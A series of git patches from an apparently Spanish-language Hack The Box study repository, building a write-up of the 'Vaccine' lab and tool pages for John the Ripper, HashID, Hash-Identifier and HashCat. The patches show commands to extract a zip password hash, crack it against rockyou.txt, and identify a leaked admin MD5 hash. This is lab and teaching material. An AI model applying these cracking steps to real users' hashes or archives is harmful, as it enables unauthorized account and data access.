Date: Tue, 26 Apr 2022 10:10:00 +0200
Subject: [PATCH 0042/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index 437ef015667..5c48e3f0e7a 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -156,6 +156,8 @@ podemos ver como nos reporta que dentro del .zip contiene dos archivos (index.ph
+
+
From 665087fc58b17a6aba88053a9ed03a911d761a46 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 10:22:02 +0200
Subject: [PATCH 0043/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index 5c48e3f0e7a..0aa2ae80bef 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -150,6 +150,11 @@ podemos ver como nos reporta que dentro del .zip contiene dos archivos (index.ph

+Como desconocemos la contraseña, vamos a utilizar la herramienta John the Ripper para tratar de descifrarla. En
+caso de no tener la herramienta instalada o queráis leer más sobre ella podréis encontrarlo en el siguiente enlace:
+
+[John the Ripper](./john_the_ripper.html)
+
From 50c375dc199170043a30156c133b97acafae0ba7 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 10:39:04 +0200
Subject: [PATCH 0044/1701] Create john_the_ripper.md
---
john_the_ripper.md | 26 ++++++++++++++++++++++++++
1 file changed, 26 insertions(+)
create mode 100644 john_the_ripper.md
diff --git a/john_the_ripper.md b/john_the_ripper.md
new file mode 100644
index 00000000000..cad719db372
--- /dev/null
+++ b/john_the_ripper.md
@@ -0,0 +1,26 @@
+
+
+# JOHN THE RIPPER
+
+John the Ripper es una herramienta de software gratuita para descifrar contraseñas. Originalmente desarrollado
+para el sistema operativo Unix, puede ejecutarse en quince plataformas diferentes (once de las cuales son versiones
+específicas de la arquitectura de Unix, DOS, Win32, BeOS y OpenVMS). Es uno de los programas de prueba y ruptura de
+contraseñas más utilizados, ya que combina una serie de crackers de contraseñas en un solo paquete, detecta
+automáticamente los tipos de hash de contraseña e incluye un cracker personalizable. Se puede ejecutar en varios
+formatos de contraseña cifrada, incluidos varios tipos de hash de contraseña cifrada que se encuentran más comúnmente
+en varias versiones de Unix (basadas en DES, MD5 o Blowfish), Kerberos AFS y Windows NT/2000/XP/2003 LM hash.
+
+Los módulos adicionales han ampliado su capacidad para incluir hash de contraseñas basadas en MD4 y contraseñas
+almacenadas en LDAP, MySQL y otros.
+
+## Instalación:
+
+John the Ripper viene preinstalado con Parrot OS y Kali Linux, sin embargo, si no lo tiene, puedes instalarlo desde
+el repositorio:
+
+ sudo apt install john
+
+
+## Instrucciones de uso:
+
+Para tratar de
From 58a1662b2741a2357a5b0503f9236453d75907c5 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 11:11:21 +0200
Subject: [PATCH 0045/1701] Update john_the_ripper.md
---
john_the_ripper.md | 37 ++++++++++++++++++++++++++++++++++++-
1 file changed, 36 insertions(+), 1 deletion(-)
diff --git a/john_the_ripper.md b/john_the_ripper.md
index cad719db372..6ceb5f209ac 100644
--- a/john_the_ripper.md
+++ b/john_the_ripper.md
@@ -23,4 +23,39 @@ el repositorio:
## Instrucciones de uso:
-Para tratar de
+Para utilizar John, primero debemos de entender bien como funciona el sistema de hash y de contraseñas.
+
+Antes de ejecutrar John, tendremos que extraer el hash del archivo que queremos descifrar. Para posteriormente saber
+que algoritmo de hash utiliza, y luego, por medio de un diccionario, utilizar fuerza bruta hasta descibrar el hash.
+
+Las funciones más típicas de hash de contraseñas son MD5, SHA-1, SHA2-256, SHA2-512 entre otras.
+
+Actualmente los algoritmos más comunes para proteger las contraseñas son KDF: Argon2 (KDF) scrypt (KDF) bcrypt PBKDF2
+(KDF).
+
+La principal diferencia entre un KDF y una función de hash de contraseñas, es que la longitud con los KDF
+es arbitraria, y en las típicas funciones hash tienen una salida de longitud fija.
+
+No obstante, se siguen utilizando mucho las funciones de hash.
+
+### Extraer hash de un .zip:
+
+ zip2john [archivo.zip] > hash1
+
+De está manera extraeremos el hash del archivo .zip en el archivo 'hash1' para posteriormente poder trabajar con él.
+
+### Ejecutar John y el diccionario rockyou.txt:
+
+ john --wordlist=/usr/share/wordlists/rockyou.txt hash1
+
+
+
+El archivo rockyou.txt es un diccionario con mas de 14 millones de contraseñas. En caso de no tenerlo, podeis
+descargarlo y guardarlo en la ruta /usr/share/wordlists/
+
+Muy bien, ahora para poder ver la contraseña descifrada:
+
+ john --show hash
+
+ 
+
From 6151a66256437715ed6c85a87422877caab711a6 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 11:15:06 +0200
Subject: [PATCH 0046/1701] Update john_the_ripper.md
---
john_the_ripper.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/john_the_ripper.md b/john_the_ripper.md
index 6ceb5f209ac..68a315ea310 100644
--- a/john_the_ripper.md
+++ b/john_the_ripper.md
@@ -40,13 +40,13 @@ No obstante, se siguen utilizando mucho las funciones de hash.
### Extraer hash de un .zip:
- zip2john [archivo.zip] > hash1
+ zip2john [archivo.zip] > hash
-De está manera extraeremos el hash del archivo .zip en el archivo 'hash1' para posteriormente poder trabajar con él.
+De está manera extraeremos el hash del archivo .zip en el archivo 'hash' para posteriormente poder trabajar con él.
### Ejecutar John y el diccionario rockyou.txt:
- john --wordlist=/usr/share/wordlists/rockyou.txt hash1
+ john --wordlist=/usr/share/wordlists/rockyou.txt hash

From d0b7dee9a5581d295fc8ea02076299097085098c Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 11:16:19 +0200
Subject: [PATCH 0047/1701] Update john_the_ripper.md
---
john_the_ripper.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/john_the_ripper.md b/john_the_ripper.md
index 68a315ea310..b7c4c0aa063 100644
--- a/john_the_ripper.md
+++ b/john_the_ripper.md
@@ -42,7 +42,7 @@ No obstante, se siguen utilizando mucho las funciones de hash.
zip2john [archivo.zip] > hash
-De está manera extraeremos el hash del archivo .zip en el archivo 'hash' para posteriormente poder trabajar con él.
+De esta manera extraeremos el hash del archivo .zip en el archivo 'hash' para posteriormente poder trabajar con él.
### Ejecutar John y el diccionario rockyou.txt:
@@ -50,7 +50,7 @@ De está manera extraeremos el hash del archivo .zip en el archivo 'hash' para p

-El archivo rockyou.txt es un diccionario con mas de 14 millones de contraseñas. En caso de no tenerlo, podeis
+El archivo rockyou.txt es un diccionario con más de 14 millones de contraseñas. En caso de no tenerlo, podéis
descargarlo y guardarlo en la ruta /usr/share/wordlists/
Muy bien, ahora para poder ver la contraseña descifrada:
From d97d2c0bee758dba7508519cf3c114e10ba0166d Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 11:23:53 +0200
Subject: [PATCH 0048/1701] Update index.md
---
index.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/index.md b/index.md
index e1e6c347a10..4160575a8db 100644
--- a/index.md
+++ b/index.md
@@ -6,6 +6,8 @@
[HTB-Responder](./HTB-Responder.html)
+[HTB-Vaccine](./HTB-Vaccine.html)
+
## Herramientas y Scripts
From 319927e02950ff12686132d3ed122329ce8d253c Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 11:26:25 +0200
Subject: [PATCH 0049/1701] Update index.md
---
index.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/index.md b/index.md
index 4160575a8db..9daef6584b4 100644
--- a/index.md
+++ b/index.md
@@ -17,6 +17,8 @@
[php-reverse-shell.php](./php-reverse-shell.html)
+[John the Ripper](./john_the_ripper.html)
+
## Artículos
[Fase de Reconocimiento - HTB](./Fase_de_reconocimiento-HTB.html)
From 787b313b23a5a62dd781e73fd37f9855ae224f62 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 11:56:02 +0200
Subject: [PATCH 0050/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 44 +++++++++++++++++++++++++++++++++++++++++++-
1 file changed, 43 insertions(+), 1 deletion(-)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index 0aa2ae80bef..99ad3335f12 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -145,7 +145,7 @@ Una vez dentro del nuevo directorio, aplicaremos el comando 'unzip' para tratar

-Al intentar descomprimir el arhcivo nos pide una contraseña, como desconozco la contraseña, presionado 'Enter'
+Al intentar descomprimir el archivo nos pide una contraseña, como desconozco la contraseña, presionado 'Enter'
podemos ver como nos reporta que dentro del .zip contiene dos archivos (index.php y style.css):

@@ -155,8 +155,50 @@ caso de no tener la herramienta instalada o queráis leer más sobre ella podré
[John the Ripper](./john_the_ripper.html)
+### John the Ripper:
+Nos posicionamos en el directorio donde se encuentre el archivo backup.zip:
+
+
+En primer lugar, vamos a extraer el hash del archivo 'backup.zip', para ello utilizaremos el comando zip2john y
+guardaremos los resultados en un archivo nuevo que llamaremos 'hash1':
+
+ zip2john 'backup.zip' > hash1
+
+
+
+Como podemos ver, se nos ha generado un nuevo archivo en nuestro directorio actual con el nombre de 'hash1'.
+
+
+
+Mediante 'cat' podemos ver su contenido, el hash extraído del archivo .zip.
+
+ cat hash1
+
+
+
+Perfecto, ya tenemos nuestro hash listo para explotarlo, ahora mediante la herramienta John, vamos a tratar de
+descifrar el 'hash' mediante un diccionario de fuerza bruta llamado rockyou.txt. Rockyou.txt es un diccionario
+con más de 14 millones de contraseñas, el cual se puede encontrar por internet en distintos repositorios.
+
+Es aconsejable alojar el archivo rockyou.txt en la ruta '/usr/share/wordlists/'.
+
+Para ejecutar el ataque por diccionario con John, utilizaremos la variable '--wordlist' especificando la ruta del
+diccionario, y luego, también especificamos el archivo que queremos tratar de descifrar, en nuestro caso 'hash1':
+
+ john --worlist=/usr/share/wordlists/rockyou.txt hash
+
+
+
+Como podemos ver, la herramienta John enseguida nos reporta que ha procesado 1 contraseña y que no quedan más hashes
+que crackear.
+
+Para poder ver la contraseña simplemente utilizamos John con la variable '--show' y especificar el archivo.
+
+ john --show hash1
+
+
From bec820261a3d1878c02d78ec2e88f482a0d24ed6 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 12:11:43 +0200
Subject: [PATCH 0051/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 30 +++++++++++++++++++++++++++++-
1 file changed, 29 insertions(+), 1 deletion(-)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index 99ad3335f12..51b9b83b7f9 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -2,7 +2,7 @@

-# HTB - Vaccine
+# HTB-Vaccine
Resolución del starting poing de Hack the Box Vaccine.
@@ -200,6 +200,34 @@ Para poder ver la contraseña simplemente utilizamos John con la variable '--sho

+Ahora ya podemos copiar la contraseña y descomprimir el archivo .zip:
+
+ unzip backup.zip
+
+
+
+
+Y podemos ver como ya tenemos los archivos index.php y style.css en nuestro direcctiorio:
+
+
+
+### Revisión del código fuente:
+
+Tras revisar el archivo index.php, podemos ver como es una copia del código fuente de la página de inicio de sesión
+anterior.
+Pero si nos fijamos incluye unas líneas adicionales. Para ver el código fuente podemos abrir el archivo
+index.php mediante 'cat' o dirigirnos a la url http://[Ip Víctima]/index.php (la página es visualmente es igual) y
+con clic derecho sobre la página y 'ver código fuente'.
+
+ cat index.php
+
+
+
+El apartado que a nosotros nos interesa es el 'session_start', donde nos reporta un nombre de usuario 'admin' y un
+hash de una contraseña.
+
+
+
From fea206bf3989a8add1c8325c1c1394dcbb13b807 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 12:33:22 +0200
Subject: [PATCH 0052/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 27 +++++++++++++++++++++++++++
1 file changed, 27 insertions(+)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index 51b9b83b7f9..e0f9dd6177a 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -228,7 +228,34 @@ hash de una contraseña.

+Para trabajar de manera más cómoda, crearemos un archivo llamado credentials.txt y guardaremos el usuario(admin) y
+el hash econtrados.
+ nano credentials.txt
+
+
+
+Guardamos (Cntrl + o) y salimos (Cntrl + x).
+
+
+
+### Hashid:
+
+Tenemos un hash, pero aún no sabemos en que tipo de algoritmo está basado. Para saberlo, utilizaremos la herramienta
+Hashid, la cual nos reportará el tipo de algoritmo más provable que se utilizo en su día para crear ese hash a
+partir de una contraseña.
+
+Para instalar la herramienta:
+
+ sudo apt install hashid
+
+Para ejecutarla:
+
+ hashid [Hash Núm]
+
+ hashid 2cb42f8734ea607eefed3b70af13bbd3
+
+
From 5d3fe675320815cb09cc0edf1a890fd590ab05ce Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 19:30:27 +0200
Subject: [PATCH 0053/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 12 ++++++++----
1 file changed, 8 insertions(+), 4 deletions(-)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index e0f9dd6177a..52c47fa04e1 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -215,7 +215,7 @@ Y podemos ver como ya tenemos los archivos index.php y style.css en nuestro dire
Tras revisar el archivo index.php, podemos ver como es una copia del código fuente de la página de inicio de sesión
anterior.
-Pero si nos fijamos incluye unas líneas adicionales. Para ver el código fuente podemos abrir el archivo
+Pero si nos fijamos, incluye unas líneas adicionales. Para ver el código fuente podemos abrir el archivo
index.php mediante 'cat' o dirigirnos a la url http://[Ip Víctima]/index.php (la página es visualmente es igual) y
con clic derecho sobre la página y 'ver código fuente'.
@@ -229,7 +229,7 @@ hash de una contraseña.

Para trabajar de manera más cómoda, crearemos un archivo llamado credentials.txt y guardaremos el usuario(admin) y
-el hash econtrados.
+el hash encontrados.
nano credentials.txt
@@ -241,8 +241,8 @@ Guardamos (Cntrl + o) y salimos (Cntrl + x).
### Hashid:
-Tenemos un hash, pero aún no sabemos en que tipo de algoritmo está basado. Para saberlo, utilizaremos la herramienta
-Hashid, la cual nos reportará el tipo de algoritmo más provable que se utilizo en su día para crear ese hash a
+Tenemos un hash, pero aún no sabemos en qué tipo de algoritmo está basado. Para saberlo, utilizaremos la herramienta
+Hashid, la cual nos reportará el tipo de algoritmo más probable que se utilizó en su día para crear ese hash a
partir de una contraseña.
Para instalar la herramienta:
@@ -257,6 +257,10 @@ Para ejecutarla:

+Según la herramienta HashId el algoritmo de nuestro hash es un MD2, MD5 o MD4. Recordar que la aplicación nos
+reporta los más probables, en ocasiones el primero en reportar no es el correcto. Para contrastar esta información
+voy a mostraros otra herramienta que sirve para lo mismo, pero es un poco más precisa.
+
From 9bf92a2908e84a641ab5ecebc38bf4de8825a9ce Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 19:45:39 +0200
Subject: [PATCH 0054/1701] Create HashId.md
---
HashId.md | 38 ++++++++++++++++++++++++++++++++++++++
1 file changed, 38 insertions(+)
create mode 100644 HashId.md
diff --git a/HashId.md b/HashId.md
new file mode 100644
index 00000000000..9d735f0d7b5
--- /dev/null
+++ b/HashId.md
@@ -0,0 +1,38 @@
+# Hashid:
+
+Hashid es una herramienbta que nos reportará el tipo de algoritmo más probable que se utilizó en su día para crear
+ese hash a partir de una contraseña.
+
+## Instalación:
+
+Para instalar la herramienta:
+
+ sudo apt install hashid
+
+## Ejecución:
+
+Para ejecutarla:
+
+ hashid [Hash Núm]
+
+
+ hashid 2cb42f8734ea607eefed3b70af13bbd3
+
+### Ejemplo:
+
+
+
+Según la herramienta HashId el algoritmo de nuestro hash es un MD2, MD5 o MD4.
+
+Recordar que la aplicación nos reporta los más probables, en ocasiones el primero en reportar no es el
+correcto, por tanto, tener en cuenta los dos o tres primeros en orden descendente, ya que el primero que nos
+reporta es el que en teoría tiene más probabilidades.
+
+
+
+
+
+
+
+
+
From 3502a21380c87188d26a014017c6249d5394783b Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 19:47:31 +0200
Subject: [PATCH 0055/1701] Update index.md
---
index.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/index.md b/index.md
index 9daef6584b4..2533c2250de 100644
--- a/index.md
+++ b/index.md
@@ -19,6 +19,8 @@
[John the Ripper](./john_the_ripper.html)
+[HashID](./HashId.html)
+
## Artículos
[Fase de Reconocimiento - HTB](./Fase_de_reconocimiento-HTB.html)
From 70a19b818e8bb76d8f0cf3d5d2ed6d7d84eb4163 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 19:51:18 +0200
Subject: [PATCH 0056/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index 52c47fa04e1..c5a2ddf1e50 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -239,12 +239,14 @@ Guardamos (Cntrl + o) y salimos (Cntrl + x).

-### Hashid:
+### HashID:
Tenemos un hash, pero aún no sabemos en qué tipo de algoritmo está basado. Para saberlo, utilizaremos la herramienta
Hashid, la cual nos reportará el tipo de algoritmo más probable que se utilizó en su día para crear ese hash a
partir de una contraseña.
+Podéis encontrar más información aquí: [HashID](./HashId.html)
+
Para instalar la herramienta:
sudo apt install hashid
@@ -264,6 +266,7 @@ voy a mostraros otra herramienta que sirve para lo mismo, pero es un poco más p
+
From 2e4e7e3e70006cedb2c5303aec2ad60ccae49953 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 20:11:27 +0200
Subject: [PATCH 0057/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 34 ++++++++++++++++++++++++++++++++++
1 file changed, 34 insertions(+)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index c5a2ddf1e50..bf5c928d570 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -263,6 +263,40 @@ Según la herramienta HashId el algoritmo de nuestro hash es un MD2, MD5 o MD4.
reporta los más probables, en ocasiones el primero en reportar no es el correcto. Para contrastar esta información
voy a mostraros otra herramienta que sirve para lo mismo, pero es un poco más precisa.
+### Hash-Identifier
+
+Está herramienta hace básicamente lo mismo que HashId, nos reporta el algoritmo del hash deseado, con la diferencia
+de que Hash-Identifier es algo más precisa a la hora de reportar los resusltados.
+
+Para instalar:
+
+ sudo apt install hash-identifier
+
+ 
+
+Para ejecutarlo:
+
+ hash-identifier
+
+
+
+Vemos como se nos despliega una interfaz gráfica donde pegaremos el hash que queremos analizar.
+
+
+
+
+
+Una vez analizado el hash, vemos como en la parte superior nos reporta los algoritmos, en este caso MD5.
+
+
+
+Perfecto, ya tenemos un hash y conocemos el algoritmo en el que esta basado. El siguiente paso será crackear el hash.
+Para ello, vamos a ver dos formas de crakear un hash, en primer lugar utilizaremos la herramienta HashCat.
+
+## Crackear Hash:
+
+### HashCat:
+
From 4cf9e3713543b714b6eb878b9855453a7d42bae6 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 20:17:50 +0200
Subject: [PATCH 0058/1701] Update HTB-Vaccine.md
---
HTB-Vaccine.md | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/HTB-Vaccine.md b/HTB-Vaccine.md
index bf5c928d570..08bfe5e66ba 100644
--- a/HTB-Vaccine.md
+++ b/HTB-Vaccine.md
@@ -239,6 +239,8 @@ Guardamos (Cntrl + o) y salimos (Cntrl + x).

+## Identificar algoritmo del Hash
+
### HashID:
Tenemos un hash, pero aún no sabemos en qué tipo de algoritmo está basado. Para saberlo, utilizaremos la herramienta
@@ -263,7 +265,7 @@ Según la herramienta HashId el algoritmo de nuestro hash es un MD2, MD5 o MD4.
reporta los más probables, en ocasiones el primero en reportar no es el correcto. Para contrastar esta información
voy a mostraros otra herramienta que sirve para lo mismo, pero es un poco más precisa.
-### Hash-Identifier
+### Hash-Identifier:
Está herramienta hace básicamente lo mismo que HashId, nos reporta el algoritmo del hash deseado, con la diferencia
de que Hash-Identifier es algo más precisa a la hora de reportar los resusltados.
@@ -293,7 +295,7 @@ Una vez analizado el hash, vemos como en la parte superior nos reporta los algor
Perfecto, ya tenemos un hash y conocemos el algoritmo en el que esta basado. El siguiente paso será crackear el hash.
Para ello, vamos a ver dos formas de crakear un hash, en primer lugar utilizaremos la herramienta HashCat.
-## Crackear Hash:
+## Crackear Hash
### HashCat:
From d2ee3f236a47e68751087a108ad2a58ea1091e78 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 20:29:05 +0200
Subject: [PATCH 0059/1701] Create HashCat.md
---
HashCat.md | 3 +++
1 file changed, 3 insertions(+)
create mode 100644 HashCat.md
diff --git a/HashCat.md b/HashCat.md
new file mode 100644
index 00000000000..346e410f8fd
--- /dev/null
+++ b/HashCat.md
@@ -0,0 +1,3 @@
+
+
+### HashCat
From e9a6f8c3c63b5aac71bf2c00d1ec2c159bc38811 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 20:30:30 +0200
Subject: [PATCH 0060/1701] Update index.md
---
index.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/index.md b/index.md
index 2533c2250de..295b611a778 100644
--- a/index.md
+++ b/index.md
@@ -21,6 +21,8 @@
[HashID](./HashId.html)
+[HashCat](./HashCat.html)
+
## Artículos
[Fase de Reconocimiento - HTB](./Fase_de_reconocimiento-HTB.html)
From 5f4265c617c9e37f8bb33760de9c9fd290670dab Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 20:51:51 +0200
Subject: [PATCH 0061/1701] Update HashCat.md
---
HashCat.md | 29 +++++++++++++++++++++++++++++
1 file changed, 29 insertions(+)
diff --git a/HashCat.md b/HashCat.md
index 346e410f8fd..77c198a12d3 100644
--- a/HashCat.md
+++ b/HashCat.md
@@ -1,3 +1,32 @@

### HashCat
+
+# ¿Qué es HashCat?
+
+Hashcat es un descifrador de contraseñas popular y eficaz ampliamente utilizado tanto por probadores de penetración
+como por administradores de sistemas, así como por delincuentes y espías.
+
+Su funcionamiento básicamente consiste en utilizar diccionarios precalculados, tablas y métodos de fuerza bruta
+para tratar de encontrar una forma eficaz y eficiente de descifrar contraseñas.
+
+Estas contraseñas son procesadas por un algoritmo para crear los hash. Existen diversas clases de algoritmos, pero
+lo que tenemos que tener en cuenta es que descifrar un hash es inviable, ya que se necesitaria una gran potencia
+computacional y mucho tiempo para tratar de descifrarlo.
+
+En cambio, HashCat no trata de descifrar el hash, simplemente comprueba las miles de palabras y hashes que tienen
+guardados en su base de datos hasta dar con el mismo que le hemos introducido. Este proceso es mucho más rápido ya
+que la herramienta cuenta con grandes librerias actualizadas.
+
+# Instalación:
+
+Para instalar en cualquier distribución debian:
+
+ sudo apt install hashcat
+
+
+
+En Kali Linux y ParrotOS suele venir instalada de forma predeterminada.
+
+# Ejecución:
+
From 3a0c971b7f00cfbe602c8760251165e18b4f5dc2 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 21:07:37 +0200
Subject: [PATCH 0062/1701] Update HashCat.md
---
HashCat.md | 14 ++++++++++++++
1 file changed, 14 insertions(+)
diff --git a/HashCat.md b/HashCat.md
index 77c198a12d3..166e3da8030 100644
--- a/HashCat.md
+++ b/HashCat.md
@@ -30,3 +30,17 @@ En Kali Linux y ParrotOS suele venir instalada de forma predeterminada.
# Ejecución:
+Para ver las distintas optiones y como ejecutar la herramienta:
+
+ hashcat --help
+
+Para ejecutar la herramienta, debemos especificar en que algoritmo esta basado el hash, esto podemos verlo meidante
+la herramientas [HashID](./HashId.html) o [Hash-Identifier](./Hash-Identifier.html).
+
+Crearemos un archivo, por ejemplo 'hash2' y pegamos el número hash que queremos descifrar.
+
+ nano hash2
+
+ Guardamos (Cntrl + o) y salimos (Cntrl + x).
+
+
From c27a4a762fde7e7d312e32eadb69bc3596a4ebd3 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 21:13:09 +0200
Subject: [PATCH 0063/1701] Update index.md
---
index.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/index.md b/index.md
index 295b611a778..27bbef4c95d 100644
--- a/index.md
+++ b/index.md
@@ -9,7 +9,7 @@
[HTB-Vaccine](./HTB-Vaccine.html)
-## Herramientas y Scripts
+# Herramientas y Scripts
[WichSystem](./WichSystem.html)
@@ -23,7 +23,7 @@
[HashCat](./HashCat.html)
-## Artículos
+# Artículos
[Fase de Reconocimiento - HTB](./Fase_de_reconocimiento-HTB.html)
From 39b2ff763f33df547aac1e80720c75f881b46438 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 26 Apr 2022 21:15:17 +0200
Subject: [PATCH 0064/1701] Delete LICENSE
---
LICENSE | 116 --------------------------------------------------------
1 file changed, 116 deletions(-)
delete mode 100644 LICENSE
diff --git a/LICENSE b/LICENSE
deleted file mode 100644
index 670154e3538..00000000000
--- a/LICENSE
+++ /dev/null
@@ -1,116 +0,0 @@
-CC0 1.0 Universal
-
-Statement of Purpose
-
-The laws of most jurisdictions throughout the world automatically confer
-exclusive Copyright and Related Rights (defined below) upon the creator and
-subsequent owner(s) (each and all, an "owner") of an original work of
-authorship and/or a database (each, a "Work").
-
-Certain owners wish to permanently relinquish those rights to a Work for the
-purpose of contributing to a commons of creative, cultural and scientific
-works ("Commons") that the public can reliably and without fear of later
-claims of infringement build upon, modify, incorporate in other works, reuse
-and redistribute as freely as possible in any form whatsoever and for any
-purposes, including without limitation commercial purposes. These owners may
-contribute to the Commons to promote the ideal of a free culture and the
-further production of creative, cultural and scientific works, or to gain
-reputation or greater distribution for their Work in part through the use and
-efforts of others.
-
-For these and/or other purposes and motivations, and without any expectation
-of additional consideration or compensation, the person associating CC0 with a
-Work (the "Affirmer"), to the extent that he or she is an owner of Copyright
-and Related Rights in the Work, voluntarily elects to apply CC0 to the Work
-and publicly distribute the Work under its terms, with knowledge of his or her
-Copyright and Related Rights in the Work and the meaning and intended legal
-effect of CC0 on those rights.
-
-1. Copyright and Related Rights. A Work made available under CC0 may be
-protected by copyright and related or neighboring rights ("Copyright and
-Related Rights"). Copyright and Related Rights include, but are not limited
-to, the following:
-
- i. the right to reproduce, adapt, distribute, perform, display, communicate,
- and translate a Work;
-
- ii. moral rights retained by the original author(s) and/or performer(s);
-
- iii. publicity and privacy rights pertaining to a person's image or likeness
- depicted in a Work;
-
- iv. rights protecting against unfair competition in regards to a Work,
- subject to the limitations in paragraph 4(a), below;
-
- v. rights protecting the extraction, dissemination, use and reuse of data in
- a Work;
-
- vi. database rights (such as those arising under Directive 96/9/EC of the
- European Parliament and of the Council of 11 March 1996 on the legal
- protection of databases, and under any national implementation thereof,
- including any amended or successor version of such directive); and
-
- vii. other similar, equivalent or corresponding rights throughout the world
- based on applicable law or treaty, and any national implementations thereof.
-
-2. Waiver. To the greatest extent permitted by, but not in contravention of,
-applicable law, Affirmer hereby overtly, fully, permanently, irrevocably and
-unconditionally waives, abandons, and surrenders all of Affirmer's Copyright
-and Related Rights and associated claims and causes of action, whether now
-known or unknown (including existing as well as future claims and causes of
-action), in the Work (i) in all territories worldwide, (ii) for the maximum
-duration provided by applicable law or treaty (including future time
-extensions), (iii) in any current or future medium and for any number of
-copies, and (iv) for any purpose whatsoever, including without limitation
-commercial, advertising or promotional purposes (the "Waiver"). Affirmer makes
-the Waiver for the benefit of each member of the public at large and to the
-detriment of Affirmer's heirs and successors, fully intending that such Waiver
-shall not be subject to revocation, rescission, cancellation, termination, or
-any other legal or equitable action to disrupt the quiet enjoyment of the Work
-by the public as contemplated by Affirmer's express Statement of Purpose.
-
-3. Public License Fallback. Should any part of the Waiver for any reason be
-judged legally invalid or ineffective under applicable law, then the Waiver
-shall be preserved to the maximum extent permitted taking into account
-Affirmer's express Statement of Purpose. In addition, to the extent the Waiver
-is so judged Affirmer hereby grants to each affected person a royalty-free,
-non transferable, non sublicensable, non exclusive, irrevocable and
-unconditional license to exercise Affirmer's Copyright and Related Rights in
-the Work (i) in all territories worldwide, (ii) for the maximum duration
-provided by applicable law or treaty (including future time extensions), (iii)
-in any current or future medium and for any number of copies, and (iv) for any
-purpose whatsoever, including without limitation commercial, advertising or
-promotional purposes (the "License"). The License shall be deemed effective as
-of the date CC0 was applied by Affirmer to the Work. Should any part of the
-License for any reason be judged legally invalid or ineffective under
